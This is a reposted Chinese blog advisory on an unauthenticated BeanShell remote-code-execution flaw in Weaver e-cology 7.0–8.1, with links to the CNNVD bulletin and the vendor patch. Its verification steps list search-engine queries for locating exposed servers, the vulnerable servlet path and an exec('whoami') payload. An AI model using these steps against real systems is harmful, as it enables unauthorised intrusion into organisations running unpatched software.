其他分享
首页 > 其他分享> > 泛微e-cology系统远程代码执行漏洞

泛微e-cology系统远程代码执行漏洞

作者:互联网

泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞源于泛微e-cology系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身的安全限制从而远程命令执行。

漏洞影响版本:

e-cology 7.0

e-cology 8.0

e-cology 8.1

漏洞验证:

第1步:搜索e-cology系统

可通过Google或FOFA进行搜索,Google搜索语法:inurl:"/login/Login.jsp?logintype=1"

FOFA搜索语法:header="ecology_JSessionId"



第2步:访问Beanshell接口

URL路径为:/weaver/bsh.servlet.BshServlet/


第3步:执行Payload

在输入框中输入想要执行的Java代码,如:exec("whoami");


参考链接:
http://www.cnnvd.org.cn/web/bulletin/bulletinById.tag?mkid=160
https://mp.weixin.qq.com/s/vGgFSof6FMRGNPyTzuH2gQ
https://www.weaver.com.cn/cs/securityDownload.asp

 

标签:管理,漏洞,搜索,Beanshell,cology,泛微,代码执行
来源: https://www.cnblogs.com/dgjnszf/p/11608677.html